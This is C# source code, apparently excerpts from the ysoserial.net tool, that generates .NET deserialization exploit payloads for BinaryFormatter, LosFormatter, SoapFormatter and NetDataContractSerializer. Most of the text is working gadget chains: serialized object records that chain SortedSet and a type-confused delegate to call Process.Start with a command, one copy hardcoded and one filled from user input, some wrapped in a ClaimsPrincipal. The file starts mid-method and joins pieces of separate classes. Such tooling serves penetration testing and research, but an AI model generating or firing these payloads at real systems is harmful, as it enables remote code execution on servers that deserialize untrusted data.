ndcPayload = XMLMinifier.Minify(ndcPayload, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
}
else
{
ndcPayload = XMLMinifier.Minify(ndcPayload, null, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(ndcPayload);
/*
* MemoryStream ms = new MemoryStream(Encoding.UTF8.GetBytes(ndcPayload));
* ms.Position = 0;
* ndcs.Deserialize(ms);
*/
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(ndcPayload);
//return Serialize(myResourceSet, formatter, inputArgs);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] rceGadget = (byte[])(new TypeConfuseDelegateGenerator()).GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(rceGadget);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
string payload_bf_json = @"[{'Id': 1,
'Data': {
'$type': 'SerializationHeaderRecord',
'binaryFormatterMajorVersion': 1,
'binaryFormatterMinorVersion': 0,
'binaryHeaderEnum': 0,
'topId': 1,
'headerId': -1,
'majorVersion': 1,
'minorVersion': 0
}},{'Id': 2,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 1,
'name': 'System.Security.Claims.ClaimsPrincipal',
'numMembers': 1,
'memberNames':['m_serializedClaimsIdentities'],
'binaryTypeEnumA':[1],
'typeInformationA':[null],
'typeInformationB':[null],
'memberAssemIds':[0],
'assemId': 0
}},{'Id': 10,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 5,
'value': '" + b64encoded + @"'
}},{'Id': 11,
'TypeName': 'MessageEnd',
'Data': {
'$type': 'MessageEnd'
}}]";
MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(payload_bf_json);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
if (inputArgs.Test)
{
try
{
ms.Position = 0;
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
bf.Deserialize(ms);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(ms.ToArray());
}
else
{
// it is LosFormatter
byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms.ToArray());
MemoryStream ms2 = new MemoryStream(lfSerializedObj);
ms2.Position = 0;
if (inputArgs.Test)
{
try
{
System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter();
lf.Deserialize(ms2);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(lfSerializedObj);
}
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = "";
payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:ClaimsPrincipal id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Claims"">
<m_serializedClaimsIdentities id=""ref-5"">{b64encoded}</m_serializedClaimsIdentities>
</a1:ClaimsPrincipal>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
private void ManualTCDGPayload4Minifying()
{
/*
* sampleInputArgs.Minify = true;
* sampleInputArgs.UseSimpleType = true;
*
* object tcd = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(sampleInputArgs);
*
* TypeConfuseDelegateGenerator tcdg = new TypeConfuseDelegateGenerator();
* byte[] tcd_bf_byte = (byte[]) tcdg.GenerateWithNoTest("binaryformatter", sampleInputArgs);
* string tcd_json = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte),false, true);
* Console.WriteLine(tcd_json);
* //*/
//*
string tcd_json = @"[{'Id': 1,
'Data': {
'$type': 'SerializationHeaderRecord',
'binaryFormatterMajorVersion': 1,
'binaryFormatterMinorVersion': 0,
'binaryHeaderEnum': 0,
'topId': 1,
'headerId': -1,
'majorVersion': 1,
'minorVersion': 0
}},{'Id': 2,
'TypeName': 'Assembly',
'Data': {
'$type': 'BinaryAssembly',
'assemId': 2,
'assemblyString': 'System'
}},{'Id': 3,
'TypeName': 'ObjectWithMapTypedAssemId',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 5,
'objectId': 1,
'name': 'System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]',
'numMembers': 4,
'memberNames':['Count','Comparer','Version','Items'],
'binaryTypeEnumA':[0,1,0,1],
'typeInformationA': null,
'typeInformationB':[8,null,8,null],
'memberAssemIds':[0,0,0,0],
'assemId': 2
}},{'Id': 4,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 2
}},{'Id': 5,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 3
}},{'Id': 6,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 0
}},{'Id': 7,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 4
}},{'Id': 8,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 3,
'name': 'System.Collections.Generic.ComparisonComparer`1[[System.String]]',
'numMembers': 1,
'memberNames':['_comparison'],
'binaryTypeEnumA':[1],
'typeInformationA': null,
'typeInformationB':[null],
'memberAssemIds':[0],
'assemId': 0
}},{'Id': 9,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 5
}},{'Id': 10,
'TypeName': 'ArraySingleString',
'Data': {
'$type': 'BinaryArray',
'objectId': 4,
'rank': 0,
'lengthA':[2],
'lowerBoundA': null,
'binaryTypeEnum': 0,
'typeInformation': null,
'assemId': 0,
'binaryHeaderEnum': 17,
'binaryArrayTypeEnum': 0
}},{'Id': 11,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 6,
'value': '/foo bar'
}},{'Id': 12,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 7,
'value': 'TestConsoleApp_YSONET'
}},{'Id': 13,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 5,
'name': 'System.DelegateSerializationHolder',
'numMembers': 3,
'memberNames':['Delegate','','x'],
'binaryTypeEnumA':[1,1,1],
'typeInformationA': null,
'typeInformationB':[null,null,null],
'memberAssemIds':[0,0,0],
'assemId': 0
}},{'Id': 14,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 8
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 17,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 8,
'name': 'System.DelegateSerializationHolder+DelegateEntry',
'numMembers': 7,
'memberNames':['type','assembly','','targetTypeAssembly','targetTypeName','methodName','delegateEntry'],
'binaryTypeEnumA':[1,1,1,1,1,1,1],
'typeInformationA': null,
'typeInformationB':[null,null,null,null,null,null,null],
'memberAssemIds':[0,0,0,0,0,0,0],
'assemId': 0
}},{'Id': 18,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 11,
'value': 'System.Func`3[[System.String],[System.String],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]'
}},{'Id': 19,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 12,
'value': 'mscorlib'
}},{'Id': 20,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 21,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 13,
'value': 'System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089'
}},{'Id': 22,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 14,
'value': 'System.Diagnostics.Process'
}},{'Id': 23,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 15,
'value': 'Start'
}},{'Id': 24,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 16
}},{'Id': 25,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 9,
'name': 'x',
'numMembers': 7,
'memberNames':['','','','','','',''],
'binaryTypeEnumA':[1,1,1,1,1,0,1],
'typeInformationA': null,
'typeInformationB':[null,null,null,null,null,8,null],
'memberAssemIds':[0,0,0,0,0,0,0],
'assemId': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 31,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 0
}},{'Id': 33,
'TypeName': 'Object',
'Data': {
'$type': 'BinaryObject',
'objectId': 10,
'mapId': 9
}},{'Id': 34,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 22,
'value': 'Compare'
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 36,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 24,
'value': 'System.String'
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 39,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 0
}},{'Id': 40,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 41,
'TypeName': 'Object',
'Data': {
'$type': 'BinaryObject',
'objectId': 16,
'mapId': 8
}},{'Id': 42,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 27,
'value': 'System.Comparison`1[[System.String]]'
}},{'Id': 43,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 12
}},{'Id': 44,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 45,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 12
}},{'Id': 46,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 24
}},{'Id': 47,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 22
}},{'Id': 49,
'TypeName': 'MessageEnd',
'Data': {
'$type': 'MessageEnd'
}}]";
MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(tcd_json);
try
{
string lfStr = Encoding.UTF8.GetString(SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms).ToArray());
Console.WriteLine("Length: " + lfStr.Length);
SerializersHelper.LosFormatter_deserialize(lfStr);
}
catch
{
Console.WriteLine("Error");
}
//*/
}
public override object Generate(string formatter, InputArgs inputArgs)
{
if (inputArgs.Minify && inputArgs.UseSimpleType &&
(formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("LosFormatter", StringComparison.OrdinalIgnoreCase)))
{
// This is to provide even a smaller payload
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
string tcd_json_minified = @"[{'Id': 1,
'Data': {
'$type': 'SerializationHeaderRecord',
'binaryFormatterMajorVersion': 1,
'binaryFormatterMinorVersion': 0,
'binaryHeaderEnum': 0,
'topId': 1,
'headerId': -1,
'majorVersion': 1,
'minorVersion': 0
}},{'Id': 2,
'TypeName': 'Assembly',
'Data': {
'$type': 'BinaryAssembly',
'assemId': 2,
'assemblyString': 'System'
}},{'Id': 3,
'TypeName': 'ObjectWithMapTypedAssemId',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 5,
'objectId': 1,
'name': 'System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]',
'numMembers': 4,
'memberNames':['Count','Comparer','Version','Items'],
'binaryTypeEnumA':[0,1,0,1],
'typeInformationA': null,
'typeInformationB':[8,null,8,null],
'memberAssemIds':[0,0,0,0],
'assemId': 2
}},{'Id': 4,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 2
}},{'Id': 5,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 3
}},{'Id': 6,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 0
}},{'Id': 7,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 4
}},{'Id': 8,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 3,
'name': 'System.Collections.Generic.ComparisonComparer`1[[System.String]]',
'numMembers': 1,
'memberNames':['_comparison'],
'binaryTypeEnumA':[1],
'typeInformationA': null,
'typeInformationB':[null],
'memberAssemIds':[0],
'assemId': 0
}},{'Id': 9,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 5
}},{'Id': 10,
'TypeName': 'ArraySingleString',
'Data': {
'$type': 'BinaryArray',
'objectId': 4,
'rank': 0,
'lengthA':[2],
'lowerBoundA': null,
'binaryTypeEnum': 0,
'typeInformation': null,
'assemId': 0,
'binaryHeaderEnum': 17,
'binaryArrayTypeEnum': 0
}},{'Id': 11,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 6,
'value': '" + inputArgs.CmdArguments + @"'
}},{'Id': 12,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 7,
'value': '" + inputArgs.CmdFileName + @"'
}},{'Id': 13,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 5,
'name': 'System.DelegateSerializationHolder',
'numMembers': 3,
'memberNames':['Delegate','','x'],
'binaryTypeEnumA':[1,1,1],
'typeInformationA': null,
'typeInformationB':[null,null,null],
'memberAssemIds':[0,0,0],
'assemId': 0
}},{'Id': 14,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 8
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 17,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 8,
'name': 'System.DelegateSerializationHolder+DelegateEntry',
'numMembers': 7,
'memberNames':['type','assembly','','targetTypeAssembly','targetTypeName','methodName','delegateEntry'],
'binaryTypeEnumA':[1,1,1,1,1,1,1],
'typeInformationA': null,
'typeInformationB':[null,null,null,null,null,null,null],
'memberAssemIds':[0,0,0,0,0,0,0],
'assemId': 0
}},{'Id': 18,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 11,
'value': 'System.Func`3[[System.String],[System.String],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]'
}},{'Id': 19,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 12,
'value': 'mscorlib'
}},{'Id': 20,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 21,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 13,
'value': 'System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089'
}},{'Id': 22,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 14,
'value': 'System.Diagnostics.Process'
}},{'Id': 23,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 15,
'value': 'Start'
}},{'Id': 24,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 16
}},{'Id': 25,
'TypeName': 'ObjectWithMapTyped',
'Data': {
'$type': 'BinaryObjectWithMapTyped',
'binaryHeaderEnum': 4,
'objectId': 9,
'name': 'x',
'numMembers': 7,
'memberNames':['','','','','','',''],
'binaryTypeEnumA':[1,1,1,1,1,0,1],
'typeInformationA': null,
'typeInformationB':[null,null,null,null,null,8,null],
'memberAssemIds':[0,0,0,0,0,0,0],
'assemId': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 31,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 0
}},{'Id': 33,
'TypeName': 'Object',
'Data': {
'$type': 'BinaryObject',
'objectId': 10,
'mapId': 9
}},{'Id': 34,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 22,
'value': 'Compare'
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 36,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 24,
'value': 'System.String'
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 0,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 39,
'TypeName': 'Int32',
'IsPrimitive': true,
'Data': {
'$type': 'MemberPrimitiveUnTyped',
'typeInformation': 8,
'value': 0
}},{'Id': 40,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 41,
'TypeName': 'Object',
'Data': {
'$type': 'BinaryObject',
'objectId': 16,
'mapId': 8
}},{'Id': 42,
'TypeName': 'ObjectString',
'Data': {
'$type': 'BinaryObjectString',
'objectId': 27,
'value': 'System.Comparison`1[[System.String]]'
}},{'Id': 43,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 12
}},{'Id': 44,
'TypeName': 'ObjectNull',
'Data': {
'$type': 'ObjectNull',
'nullCount': 0
}},{'Id': 45,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 12
}},{'Id': 46,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 24
}},{'Id': 47,
'TypeName': 'MemberReference',
'Data': {
'$type': 'MemberReference',
'idRef': 22
}},{'Id': 49,
'TypeName': 'MessageEnd',
'Data': {
'$type': 'MessageEnd'
}}]";
MemoryStream ms_bf = AdvancedBinaryFormatterParser.JsonToStream(tcd_json_minified);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
//BinaryFormatter
if (inputArgs.Test)
{
try
{
ms_bf.Position = 0;
SerializersHelper.BinaryFormatter_deserialize(ms_bf);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(ms_bf.ToArray());
}
else
{
// LosFormatter
MemoryStream ms_lf = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms_bf);
if (inputArgs.Test)
{
try
{
ms_bf.Position = 0;
SerializersHelper.LosFormatter_deserialize(ms_lf.ToArray());
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(ms_lf.ToArray());
}
}
else
{
return(Serialize(TypeConfuseDelegateGadget(inputArgs), formatter, inputArgs));
}
}